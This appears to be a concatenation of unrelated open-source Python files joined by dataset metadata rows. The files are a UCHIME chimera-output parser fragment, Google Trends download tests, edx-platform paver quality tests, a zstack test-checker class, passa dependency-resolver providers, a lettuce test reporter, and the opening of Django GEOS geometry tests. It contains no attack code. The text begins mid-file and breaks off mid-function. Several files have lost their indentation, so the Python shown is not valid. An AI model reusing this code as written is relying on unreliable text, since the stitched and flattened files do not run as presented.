chimera_yesno = lst[-1]
                    if chimera_yesno == 'Y':
chimera_deleted[id] = 'chimera'
# open to append as trimming deletions are already there
fh_del = open(deleted_file,"a")
for id in chimera_deleted:
fh_del.write(id+"\tChimera\n")
fh_del.close()
# # http://drive5.com/uchime/uchime_quickref.pdf
# # The --uchimeout file is a tab-separated file with the following 17 fields.
# # Field Name Description
# # 1 Score Value >= 0.0, high score means more likely to be a chimera.
# # 2 Query Sequence label
# # 3 Parent A Sequence label
# # 4 Parent B Sequence label
# # 5 IdQM %id between query and model made from (A, crossover, B)
# # 6 IdQA %id between query and parent A.
# # 7 IdQB %id between query and parent B
# # 8 IdAB %id between parents (A and B).
# # 9 IdQT %id between query and closest reference sequence / candidate parent.
# # 10 LY Yes votes on left
# # 11 LN No votes on left
# # 12 LA Abstain votes on left
# # 13 RY Yes votes on right
# # 14 RN No votes on right
# # 15 RA Abstain votes on right
# # 16 Div Divergence ratio, i.e. IdQM - IdQT
# # 17 YN Y (yes) or N (no) classification as a chimera. Set to Y if score >= threshold
| mit | -1,459,004,407,187,858,000 | 44.04194 | 200 | 0.529549 | false |
ecsalina/gtrends | test_download.py | 1 | 4390 | # -*- coding: utf-8 -*-
import pytest
import getpass
import datetime
import gtrends
#SETUP
username = getpass.getpass("username: ")
password = getpass.getpass("password: ")
startDt = datetime.datetime(year=2006, month=1, day=1)
#countMonth = 1 for daily and 5 for weekly
#TEST DOES DOWNLOAD?
#many files
def testDownloadOneFile():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadTwoFile():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 2,
1, '2m', '', '', '', '')
assert len(report) == 2
def testDownloadThreeFile():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 3,
1, '2m', '', '', '', '')
assert len(report) == 3
#many terms
def testDownloadTwoTerms():
report = gtrends._downloadReport(username, password, ["banana", "pie"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadThreeTerms():
report = gtrends._downloadReport(username, password, ["banana", "pie", "mango"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
#weird input
def testDownloadUnicode():
report = gtrends._downloadReport(username, password, [u"banana"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadUnicodeLatinChar():
report = gtrends._downloadReport(username, password, ["café"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadUnicodeNonLatinChar():
report = gtrends._downloadReport(username, password, ["咖啡店"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadNum():
report = gtrends._downloadReport(username, password, ["666"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadPunct():
report = gtrends._downloadReport(username, password, "~!@#$%^&*()_+-=;':[]{]\|,<.>/?}]", startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
#extra attributes (countries, categories, timezones, etc.)
def testDownloadGeo():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', 'IT', '', '', '')
assert len(report) == 1
def testDownloadCat():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '0-7', '', '')
assert len(report) == 1
def testDownloadSearchType():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '', 'news', '')
assert len(report) == 1
def testDownloadTZ():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '', '', 'America/Detroit')
assert len(report) == 1
#TEST CORRECT DOWNLOAD?
#many terms
def testDownloadOneTermCorr():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 1,
1, '2m', '', '', '', '')
lines = report[0].split("\n")
assert "banana" in lines[0]
def testDownloadTwoTermCorr():
report = gtrends._downloadReport(username, password, ["banana", "albero"], startDt, 1,
1, '2m', '', '', '', '')
lines = report[0].split("\n")
assert "banana" in lines[0] and "albero" in lines[0]
def testDownloadFiveTermCorr():
report = gtrends._downloadReport(username, password, ["banana", "albero", "finestra", "tutelare", "ambiente"], startDt, 1,
1, '2m', '', '', '', '')
lines = report[0].split("\n")
assert "banana" in lines[0] and "albero" in lines[0] and "finestra" in lines[0] and "tutelare" in lines[0] and "ambiente" in lines[0]
#extra attributes (countries, categories, timezones, etc.)
def testDownloadGeoRight():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', 'IT', '', '', '')
lines = report[0].split("\n")
assert "Italy" in lines[1]
def testDownloadCatRight():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '0-71', '', '')
assert "Food & Drink" in report[0]
def testDownloadSearchTypeRight():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '', 'news', '')
lines = report[0].split("\n")
assert "News" in lines[0]
#there is no way to test TZ, so I leave this as an exercise to the reader.
# def testDownloadTZ():
# report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
# 1, '2m', '', '', '', 'America/Detroit')
# assert ? | mit | 4,239,487,882,005,819,400 | 30.314286 | 134 | 0.628565 | false |
fintech-circle/edx-platform | pavelib/paver_tests/test_paver_quality.py | 1 | 14472 | """
Tests for paver quality tasks
"""
import os
import tempfile
import textwrap
import unittest
import paver.easy
import paver.tasks
from ddt import ddt, file_data
from mock import MagicMock, mock_open, patch
from path import Path as path
from paver.easy import BuildFailure
import pavelib.quality
from pavelib.paver_tests.utils import fail_on_eslint, fail_on_pylint
@ddt
class TestPaverQualityViolations(unittest.TestCase):
"""
For testing the paver violations-counting tasks
"""
def setUp(self):
super(TestPaverQualityViolations, self).setUp()
self.f = tempfile.NamedTemporaryFile(delete=False)
self.f.close()
self.addCleanup(os.remove, self.f.name)
def test_pylint_parser_other_string(self):
with open(self.f.name, 'w') as f:
f.write("hello")
num = pavelib.quality._count_pylint_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 0)
def test_pylint_parser_pep8(self):
# Pep8 violations should be ignored.
with open(self.f.name, 'w') as f:
f.write("foo/hello/test.py:304:15: E203 whitespace before ':'")
num = pavelib.quality._count_pylint_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 0)
@file_data('pylint_test_list.json')
def test_pylint_parser_count_violations(self, value):
"""
Tests:
- Different types of violations
- One violation covering multiple lines
"""
with open(self.f.name, 'w') as f:
f.write(value)
num = pavelib.quality._count_pylint_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 1)
def test_pep8_parser(self):
with open(self.f.name, 'w') as f:
f.write("hello\nhithere")
num, _violations = pavelib.quality._pep8_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 2)
class TestPaverReportViolationsCounts(unittest.TestCase):
"""
For testing utility functions for getting counts from reports for
run_eslint, run_complexity, run_safelint, and run_safecommit_report.
"""
def setUp(self):
super(TestPaverReportViolationsCounts, self).setUp()
# Mock the paver @needs decorator
self._mock_paver_needs = patch.object(pavelib.quality.run_quality, 'needs').start()
self._mock_paver_needs.return_value = 0
# Temporary file infrastructure
self.f = tempfile.NamedTemporaryFile(delete=False)
self.f.close()
# Cleanup various mocks and tempfiles
self.addCleanup(self._mock_paver_needs.stop)
self.addCleanup(os.remove, self.f.name)
def test_get_eslint_violations_count(self):
with open(self.f.name, 'w') as f:
f.write("3000 violations found")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "eslint") # pylint: disable=protected-access
self.assertEqual(actual_count, 3000)
def test_get_eslint_violations_no_number_found(self):
with open(self.f.name, 'w') as f:
f.write("Not expected string regex")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "eslint") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_get_eslint_violations_count_truncated_report(self):
"""
A truncated report (i.e. last line is just a violation)
"""
with open(self.f.name, 'w') as f:
f.write("foo/bar/js/fizzbuzz.js: line 45, col 59, Missing semicolon.")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "eslint") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_complexity_value(self):
with open(self.f.name, 'w') as f:
f.write("Average complexity: A (1.93953443446)")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "python_complexity") # pylint: disable=protected-access
self.assertEqual(actual_count, 1.93953443446)
def test_truncated_complexity_report(self):
with open(self.f.name, 'w') as f:
f.write("M 110:4 FooBar.default - A")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "python_complexity") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_no_complexity_report(self):
with self.assertRaises(BuildFailure):
pavelib.quality._get_count_from_last_line("non-existent-file", "python_complexity") # pylint: disable=protected-access
def test_generic_value(self):
"""
Default behavior is to look for an integer appearing at head of line
"""
with open(self.f.name, 'w') as f:
f.write("5.777 good to see you")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "foo") # pylint: disable=protected-access
self.assertEqual(actual_count, 5)
def test_generic_value_none_found(self):
"""
Default behavior is to look for an integer appearing at head of line
"""
with open(self.f.name, 'w') as f:
f.write("hello 5.777 good to see you")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "foo") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_get_safelint_counts_happy(self):
"""
Test happy path getting violation counts from safelint report.
"""
report = textwrap.dedent("""
test.html: 30:53: javascript-jquery-append: $('#test').append(print_tos);
javascript-concat-html: 310 violations
javascript-escape: 7 violations
2608 violations total
""")
with open(self.f.name, 'w') as f:
f.write(report)
counts = pavelib.quality._get_safelint_counts(self.f.name) # pylint: disable=protected-access
self.assertDictEqual(counts, {
'rules': {
'javascript-concat-html': 310,
'javascript-escape': 7,
},
'total': 2608,
})
def test_get_safelint_counts_bad_counts(self):
"""
Test getting violation counts from truncated and malformed safelint
report.
"""
report = textwrap.dedent("""
javascript-concat-html: violations
""")
with open(self.f.name, 'w') as f:
f.write(report)
counts = pavelib.quality._get_safelint_counts(self.f.name) # pylint: disable=protected-access
self.assertDictEqual(counts, {
'rules': {},
'total': None,
})
def test_get_safecommit_count_happy(self):
"""
Test happy path getting violation count from safecommit report.
"""
report = textwrap.dedent("""
Linting lms/templates/navigation.html:
2 violations total
Linting scripts/tests/templates/test.underscore:
3 violations total
""")
with open(self.f.name, 'w') as f:
f.write(report)
count = pavelib.quality._get_safecommit_count(self.f.name) # pylint: disable=protected-access
self.assertEqual(count, 5)
def test_get_safecommit_count_bad_counts(self):
"""
Test getting violation count from truncated safecommit report.
"""
report = textwrap.dedent("""
Linting lms/templates/navigation.html:
""")
with open(self.f.name, 'w') as f:
f.write(report)
count = pavelib.quality._get_safecommit_count(self.f.name) # pylint: disable=protected-access
self.assertIsNone(count)
def test_get_safecommit_count_no_files(self):
"""
Test getting violation count from safecommit report where no files were
linted.
"""
report = textwrap.dedent("""
No files linted.
""")
with open(self.f.name, 'w') as f:
f.write(report)
count = pavelib.quality._get_safecommit_count(self.f.name) # pylint: disable=protected-access
self.assertEqual(count, 0)
class TestPrepareReportDir(unittest.TestCase):
"""
Tests the report directory preparation
"""
def setUp(self):
super(TestPrepareReportDir, self).setUp()
self.test_dir = tempfile.mkdtemp()
self.test_file = tempfile.NamedTemporaryFile(delete=False, dir=self.test_dir)
self.addCleanup(os.removedirs, self.test_dir)
def test_report_dir_with_files(self):
self.assertTrue(os.path.exists(self.test_file.name))
pavelib.quality._prepare_report_dir(path(self.test_dir)) # pylint: disable=protected-access
self.assertFalse(os.path.exists(self.test_file.name))
def test_report_dir_without_files(self):
os.remove(self.test_file.name)
pavelib.quality._prepare_report_dir(path(self.test_dir)) # pylint: disable=protected-access
self.assertEqual(os.listdir(path(self.test_dir)), [])
class TestPaverRunQuality(unittest.TestCase):
"""
For testing the paver run_quality task
"""
def setUp(self):
super(TestPaverRunQuality, self).setUp()
# test_no_diff_quality_failures seems to alter the way that paver
# executes these lines is subsequent tests.
# https://github.com/paver/paver/blob/master/paver/tasks.py#L175-L180
#
# The other tests don't appear to have the same impact. This was
# causing a test order dependency. This line resets that state
# of environment._task_in_progress so that the paver commands in the
# tests will be considered top level tasks by paver, and we can predict
# which path it will chose in the above code block.
#
# TODO: Figure out why one test is altering the state to begin with.
paver.tasks.environment = paver.tasks.Environment()
# mock the @needs decorator to skip it
self._mock_paver_needs = patch.object(pavelib.quality.run_quality, 'needs').start()
self._mock_paver_needs.return_value = 0
patcher = patch('pavelib.quality.sh')
self._mock_paver_sh = patcher.start()
self.addCleanup(patcher.stop)
self.addCleanup(self._mock_paver_needs.stop)
@patch('__builtin__.open', mock_open())
def test_failure_on_diffquality_pep8(self):
"""
If pep8 finds errors, pylint and eslint should still be run
"""
# Mock _get_pep8_violations to return a violation
_mock_pep8_violations = MagicMock(
return_value=(1, ['lms/envs/common.py:32:2: E225 missing whitespace around operator'])
)
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
# Test that pep8, pylint and eslint were called by counting the calls to
# _get_pep8_violations (for pep8) and sh (for diff-quality pylint & eslint)
self.assertEqual(_mock_pep8_violations.call_count, 1)
self.assertEqual(self._mock_paver_sh.call_count, 2)
@patch('__builtin__.open', mock_open())
def test_failure_on_diffquality_pylint(self):
"""
If diff-quality fails on pylint, the paver task should also fail
"""
# Underlying sh call must fail when it is running the pylint diff-quality task
self._mock_paver_sh.side_effect = fail_on_pylint
_mock_pep8_violations = MagicMock(return_value=(0, []))
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
# Test that both pep8 and pylint were called by counting the calls
# Assert that _get_pep8_violations (which calls "pep8") is called once
self.assertEqual(_mock_pep8_violations.call_count, 1)
# And assert that sh was called twice (for the calls to pylint & eslint).
# This means that even in the event of a diff-quality pylint failure, eslint is still called.
self.assertEqual(self._mock_paver_sh.call_count, 2)
@patch('__builtin__.open', mock_open())
def test_failure_on_diffquality_eslint(self):
"""
If diff-quality fails on eslint, the paver task should also fail
"""
# Underlying sh call must fail when it is running the eslint diff-quality task
self._mock_paver_sh.side_effect = fail_on_eslint
_mock_pep8_violations = MagicMock(return_value=(0, []))
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
self.assertRaises(BuildFailure)
# Test that both pep8 and pylint were called by counting the calls
# Assert that _get_pep8_violations (which calls "pep8") is called once
self.assertEqual(_mock_pep8_violations.call_count, 1)
        # And assert that sh was called twice (for the diff-quality calls to pylint & eslint)
self.assertEqual(self._mock_paver_sh.call_count, 2)
@patch('__builtin__.open', mock_open())
def test_other_exception(self):
"""
If diff-quality fails for an unknown reason on the first run (pep8), then
pylint should not be run
"""
self._mock_paver_sh.side_effect = [Exception('unrecognized failure!'), 0]
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
self.assertRaises(Exception)
# Test that pylint is NOT called by counting calls
self.assertEqual(self._mock_paver_sh.call_count, 1)
@patch('__builtin__.open', mock_open())
def test_no_diff_quality_failures(self):
# Assert nothing is raised
_mock_pep8_violations = MagicMock(return_value=(0, []))
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
pavelib.quality.run_quality("")
# Assert that _get_pep8_violations (which calls "pep8") is called once
self.assertEqual(_mock_pep8_violations.call_count, 1)
# And assert that sh was called twice (for the call to "pylint" & "eslint")
self.assertEqual(self._mock_paver_sh.call_count, 2)
| agpl-3.0 | -2,740,539,081,380,800,500 | 39.766197 | 134 | 0.635918 | false |
zstackorg/zstack-woodpecker | zstackwoodpecker/zstackwoodpecker/header/checker.py | 3 | 3333 | '''
Zstack checker header classes
@author: YYK
'''
import zstackwoodpecker.test_util as test_util
class TestChecker(object):
def __init__(self):
import os
self.exp_result = True
self.real_result = None
self.retry_count = 5
self.test_obj = None
retry_env = os.environ.get('WOODPECKER_TEST_FAILURE_RETRY')
        if retry_env and retry_env.isdigit():
self.retry_count = int(retry_env)
def __repr__(self):
return self.__class__.__name__
def set_exp_result(self, exp_result):
self.exp_result = exp_result
def set_test_object(self, test_obj):
self.test_obj = test_obj
def set_retry_count(self, retry_count):
self.retry_count = retry_count
def check(self):
'''
The sub class check() function usually will call this super function.
And after the real checking, it should call self.judge(TEST_RESULT).
The inheritance class, should not add more params to this function.
'''
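        # Illustrative subclass sketch (not part of this module):
        #   class MyStateChecker(TestChecker):
        #       def check(self):
        #           super(MyStateChecker, self).check()
        #           self.judge(self.test_obj.state == 'Expected')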
test_util.test_logger('Checker: [%s] begins.'% self.__class__.__name__)
def judge(self, result):
self.real_result = result
if self.exp_result == result:
test_util.test_logger('\
Checker: [%s] PASS. Expected result: %s. Test result: %s.' \
% (self.__class__.__name__, self.exp_result, self.real_result))
return True
else:
if self.retry_count:
test_util.test_logger('\
Checker: [%s] FAIL. Expected result: %s. Test result: %s. Try again. The left \
retry times: %s' % (self.__class__.__name__, self.exp_result, \
self.real_result, str(self.retry_count)))
self.retry_count -= 1
import time
time.sleep(1)
self.test_obj.update()
self.check()
else:
test_util.test_fail('\
Checker: [%s] FAIL. Expected result: %s. Test result: %s. No Retry' \
% (self.__class__.__name__, \
self.exp_result, self.real_result))
class CheckerFactory(object):
def create_checker(self):
pass
class CheckerChain(object):
def __init__(self):
self.checker_chain = []
def __repr__(self):
class_str = 'CheckerChain:'
for checker in self.checker_chain:
class_str = '%s [%s]' % (class_str, checker.__class__.__name__)
if not self.checker_chain:
class_str = '%s None' % class_str
return class_str
def add_checker(self, checker, exp_result, test_obj):
checker.set_test_object(test_obj)
checker.set_exp_result(exp_result)
self.checker_chain.append(checker)
def add_checker_dict(self, checker_dict, test_obj):
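        # checker_dict maps a checker class to its expected result, e.g.
        # {SomeCheckerClass: True}; each class is instantiated here before use.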
for key, value in checker_dict.iteritems():
checker = key()
checker.set_exp_result(value)
checker.set_test_object(test_obj)
self.checker_chain.append(checker)
def remove_checker(self, checker):
self.checker_chain.remove(checker)
def check(self):
if not self.checker_chain:
test_util.test_warn('Not find any checker!')
return
for checker in self.checker_chain:
checker.check()
| apache-2.0 | -1,096,926,603,586,833,300 | 30.149533 | 79 | 0.561956 | false |
kennethreitz/pipenv | pipenv/vendor/passa/models/providers.py | 1 | 8586 | # -*- coding=utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import os
import resolvelib
from ..internals.candidates import find_candidates
from ..internals.dependencies import get_dependencies
from ..internals.utils import (
filter_sources, get_allow_prereleases, identify_requirment, strip_extras,
)
PROTECTED_PACKAGE_NAMES = {"pip", "setuptools"}
class BasicProvider(resolvelib.AbstractProvider):
"""Provider implementation to interface with `requirementslib.Requirement`.
"""
def __init__(self, root_requirements, sources,
requires_python, allow_prereleases):
self.sources = sources
self.requires_python = requires_python
self.allow_prereleases = bool(allow_prereleases)
self.invalid_candidates = set()
# Remember requirements of each pinned candidate. The resolver calls
# `get_dependencies()` only when it wants to repin, so the last time
# the dependencies we got when it is last called on a package, are
# the set used by the resolver. We use this later to trace how a given
# dependency is specified by a package.
self.fetched_dependencies = {None: {
self.identify(r): r for r in root_requirements
}}
# Should Pipfile's requires.python_[full_]version be included?
self.collected_requires_pythons = {None: ""}
def identify(self, dependency):
return identify_requirment(dependency)
def get_preference(self, resolution, candidates, information):
        # TODO: Provide better sorting logic. This simply resolves the ones with
        # fewer choices first. Not sophisticated, but sounds reasonable?
return len(candidates)
def find_matches(self, requirement):
sources = filter_sources(requirement, self.sources)
candidates = find_candidates(
requirement, sources, self.requires_python,
get_allow_prereleases(requirement, self.allow_prereleases),
)
return candidates
def is_satisfied_by(self, requirement, candidate):
# A non-named requirement has exactly one candidate, as implemented in
# `find_matches()`. Since pip does not yet implement URL based lookup
# (PEP 508) yet, it must match unless there are duplicated entries in
# Pipfile. If there is, the user takes the blame. (sarugaku/passa#34)
if not requirement.is_named:
return True
# A non-named candidate can only come from a non-named requirement,
# which, since pip does not implement URL based lookup (PEP 508) yet,
# can only come from Pipfile. Assume the user knows what they're doing,
# and use it without checking. (sarugaku/passa#34)
if not candidate.is_named:
return True
# Optimization: Everything matches if there are no specifiers.
if not requirement.specifiers:
return True
# We can't handle old version strings before PEP 440. Drop them all.
# Practically this shouldn't be a problem if the user is specifying a
# remotely reasonable dependency not from before 2013.
candidate_line = candidate.as_line(include_hashes=False)
if candidate_line in self.invalid_candidates:
return False
try:
version = candidate.get_specifier().version
except (TypeError, ValueError):
print('ignoring invalid version from {!r}'.format(candidate_line))
self.invalid_candidates.add(candidate_line)
return False
return requirement.as_ireq().specifier.contains(version)
def get_dependencies(self, candidate):
sources = filter_sources(candidate, self.sources)
try:
dependencies, requires_python = get_dependencies(
candidate, sources=sources,
)
except Exception as e:
if os.environ.get("PASSA_NO_SUPPRESS_EXCEPTIONS"):
raise
print("failed to get dependencies for {0!r}: {1}".format(
candidate.as_line(include_hashes=False), e,
))
dependencies = []
requires_python = ""
# Exclude protected packages from the list. This prevents those
# packages from being locked, unless the user is actually working on
# them, and explicitly lists them as top-level requirements -- those
# packages are not added via this code path. (sarugaku/passa#15)
dependencies = [
dependency for dependency in dependencies
if dependency.normalized_name not in PROTECTED_PACKAGE_NAMES
]
if candidate.extras:
# HACK: If this candidate has extras, add the original candidate
# (same pinned version, no extras) as its dependency. This ensures
# the same package with different extras (treated as distinct by
# the resolver) have the same version. (sarugaku/passa#4)
dependencies.append(strip_extras(candidate))
candidate_key = self.identify(candidate)
self.fetched_dependencies[candidate_key] = {
self.identify(r): r for r in dependencies
}
self.collected_requires_pythons[candidate_key] = requires_python
return dependencies
class PinReuseProvider(BasicProvider):
"""A provider that reuses preferred pins if possible.
This is used to implement "add", "remove", and "only-if-needed upgrade",
where already-pinned candidates in Pipfile.lock should be preferred.
"""
def __init__(self, preferred_pins, *args, **kwargs):
super(PinReuseProvider, self).__init__(*args, **kwargs)
self.preferred_pins = preferred_pins
def find_matches(self, requirement):
candidates = super(PinReuseProvider, self).find_matches(requirement)
try:
# Add the preferred pin. Remember the resolve prefer candidates
# at the end of the list, so the most preferred should be last.
candidates.append(self.preferred_pins[self.identify(requirement)])
except KeyError:
pass
return candidates
class EagerUpgradeProvider(PinReuseProvider):
"""A specialized provider to handle an "eager" upgrade strategy.
An eager upgrade tries to upgrade not only packages specified, but also
their dependencies (recursively). This contrasts to the "only-if-needed"
default, which only promises to upgrade the specified package, and
prevents touching anything else if at all possible.
The provider is implemented as to keep track of all dependencies of the
specified packages to upgrade, and free their pins when it has a chance.
"""
def __init__(self, tracked_names, *args, **kwargs):
super(EagerUpgradeProvider, self).__init__(*args, **kwargs)
self.tracked_names = set(tracked_names)
for name in tracked_names:
self.preferred_pins.pop(name, None)
# HACK: Set this special flag to distinguish preferred pins from
# regular, to tell the resolver to NOT use them for tracked packages.
for pin in self.preferred_pins.values():
pin._preferred_by_provider = True
def is_satisfied_by(self, requirement, candidate):
        # If this is a tracking package, steer the resolver away from the
# preferred pin, and into a "normal" candidate selection process.
if (self.identify(requirement) in self.tracked_names and
getattr(candidate, "_preferred_by_provider", False)):
return False
return super(EagerUpgradeProvider, self).is_satisfied_by(
requirement, candidate,
)
def get_dependencies(self, candidate):
# If this package is being tracked for upgrade, remove pins of its
# dependencies, and start tracking these new packages.
dependencies = super(EagerUpgradeProvider, self).get_dependencies(
candidate,
)
if self.identify(candidate) in self.tracked_names:
for dependency in dependencies:
name = self.identify(dependency)
self.tracked_names.add(name)
self.preferred_pins.pop(name, None)
return dependencies
def get_preference(self, resolution, candidates, information):
# Resolve tracking packages so we have a chance to unpin them first.
name = self.identify(candidates[0])
if name in self.tracked_names:
return -1
return len(candidates)
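# Illustrative usage sketch (not part of the original module; the exact
# BasicProvider constructor arguments and the resolver class are assumptions,
# shown in the style of a resolvelib-like resolver):
#
#     provider = PinReuseProvider(preferred_pins, ...)             # add / remove
#     provider = EagerUpgradeProvider(names, preferred_pins, ...)  # eager upgrade
#     state = Resolver(provider, reporter).resolve(requirements)
#
# PinReuseProvider appends the locked pin last so it is preferred, while
# EagerUpgradeProvider rejects that pin for any tracked name (via the
# ``_preferred_by_provider`` flag) so a fresh candidate is selected instead.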
| mit | -7,365,321,261,601,924,000 | 42.363636 | 79 | 0.658164 | false |
dreamsxin/adonthell | test/questtest.py | 2 | 1251 | from adonthell import event, main, rpg
import sys
# -- test event callbacks
# -- test class
class App (main.AdonthellApp):
def run (self):
# -- add data directory to python search path
sys.path.insert (0, "data")
# -- load quest tree
rpg.quest.load ()
# -- setup some quest events
factory = event.factory ()
# -- one that detects all changes to the children of Quest_1
capture_all_event = rpg.quest_event ("Quest_1.>")
listener = factory.add (capture_all_event)
listener.connect_callback ("quest_events", "event_callbacks", "capture_all")
# -- one that detects changes of Quest_1
quest_1_event = rpg.quest_event ("Quest_1")
listener = factory.add (quest_1_event)
listener.connect_callback ("quest_events", "event_callbacks", "quest_1")
# -- start completing quest steps
rpg.quest.set_completed ("Quest_1.Part_1.Step_3")
rpg.quest.set_completed ("Quest_1.Step_1")
# -- TODO: save and reload, then continue ...
# -- complete remaining quest steps
rpg.quest.set_completed ("Quest_1.Part_1.Step_5")
rpg.quest.set_completed ("Quest_1.Step_2")
rpg.quest.set_completed ("Quest_1.Part_1.Step_4")
return 0
# -- main
if __name__ == '__main__':
theApp = App ()
theApp.init (theApp.run)
| gpl-2.0 | 8,304,030,802,440,692,000 | 26.8 | 78 | 0.66267 | false |
gxx/lettuce | lettuce/plugins/reporter.py | 19 | 2156 | import sys
class Reporter(object):
def __init__(self):
self.failed_scenarios = []
self.scenarios_and_its_fails = {}
def wrt(self, what):
if isinstance(what, unicode):
what = what.encode('utf-8')
sys.stdout.write(what)
def store_failed_step(self, step):
if step.failed and step.scenario not in self.failed_scenarios:
self.scenarios_and_its_fails[step.scenario] = step.why
self.failed_scenarios.append(step.scenario)
def print_scenario_running(self, scenario):
pass
def print_scenario_ran(self, scenario):
pass
def print_end(self, total):
if total.scenarios_passed < total.scenarios_ran:
self.wrt("\n")
self.wrt("\n")
for scenario in self.failed_scenarios:
reason = self.scenarios_and_its_fails[scenario]
self.wrt(unicode(reason.step))
self.wrt("\n")
self.wrt(reason.traceback)
self.wrt("\n")
word = total.features_ran > 1 and "features" or "feature"
self.wrt("%d %s (%d passed)\n" % (
total.features_ran,
word,
total.features_passed))
word = total.scenarios_ran > 1 and "scenarios" or "scenario"
self.wrt("%d %s (%d passed)\n" % (
total.scenarios_ran,
word,
total.scenarios_passed))
steps_details = []
for kind in "failed", "skipped", "undefined":
attr = 'steps_%s' % kind
stotal = getattr(total, attr)
if stotal:
steps_details.append("%d %s" % (stotal, kind))
steps_details.append("%d passed" % total.steps_passed)
word = total.steps > 1 and "steps" or "step"
self.wrt("%d %s (%s)\n" % (
total.steps,
word,
", ".join(steps_details)))
if total.failed_scenario_locations:
self.wrt("\n")
self.wrt("List of failed scenarios:\n")
for scenario in total.failed_scenario_locations:
self.wrt(scenario)
self.wrt("\n")
| gpl-3.0 | -3,331,234,153,947,072,000 | 31.179104 | 70 | 0.533859 | false |
AloneRoad/Inforlearn | vendor/django/contrib/gis/tests/test_geos.py | 5 | 31499 | import random, unittest, sys
from ctypes import ArgumentError
from django.contrib.gis.geos import *
from django.contrib.gis.geos.base import HAS_GDAL
from django.contrib.gis.tests.geometries import *
if HAS_NUMPY: from numpy import array
if HAS_GDAL: from django.contrib.gis.gdal import OGRGeometry, SpatialReference, CoordTransform, GEOJSON
class GEOSTest(unittest.TestCase):
@property
def null_srid(self):
"""
Returns the proper null SRID depending on the GEOS version.
See the comments in `test15_srid` for more details.
"""
info = geos_version_info()
if info['version'] == '3.0.0' and info['release_candidate']:
return -1
else:
return None
def test01a_wkt(self):
"Testing WKT output."
for g in wkt_out:
geom = fromstr(g.wkt)
self.assertEqual(g.ewkt, geom.wkt)
def test01b_hex(self):
"Testing HEX output."
for g in hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex)
def test01c_kml(self):
"Testing KML output."
for tg in wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml: self.assertEqual(kml, geom.kml)
def test01d_errors(self):
"Testing the Error handlers."
# string-based
print "\nBEGIN - expecting GEOS_ERROR; safe to ignore.\n"
for err in errors:
try:
g = fromstr(err.wkt)
except (GEOSException, ValueError):
pass
print "\nEND - expecting GEOS_ERROR; safe to ignore.\n"
class NotAGeometry(object):
pass
# Some other object
self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
# None
self.assertRaises(TypeError, GEOSGeometry, None)
# Bad WKB
self.assertRaises(GEOSException, GEOSGeometry, buffer('0'))
def test01e_wkb(self):
"Testing WKB output."
from binascii import b2a_hex
for g in hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex)
def test01f_create_hex(self):
"Testing creation from HEX."
for g in hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01g_create_wkb(self):
"Testing creation from WKB."
from binascii import a2b_hex
for g in hex_wkt:
wkb = buffer(a2b_hex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01h_ewkt(self):
"Testing EWKT."
srid = 32140
for p in polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test01i_json(self):
"Testing GeoJSON input/output (via GDAL)."
if not HAS_GDAL or not GEOJSON: return
for g in json_geoms:
geom = GEOSGeometry(g.wkt)
